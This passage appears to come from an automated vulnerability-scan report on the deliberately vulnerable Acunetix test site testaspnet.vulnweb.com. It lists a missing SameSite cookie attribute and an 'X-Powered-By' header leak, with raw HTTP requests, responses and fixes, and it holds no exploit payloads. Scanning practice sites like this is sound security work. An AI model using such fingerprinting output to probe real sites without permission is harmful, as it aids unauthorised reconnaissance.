title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	2
Solution	Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
Reference	https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site
Tags	OWASP_2021_A01 WSTG-v42-SESS-02 OWASP_2017_A05
CWE Id	1275
WASC Id	13
Plugin Id	10054

Low	Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)
Description	The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 272 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a 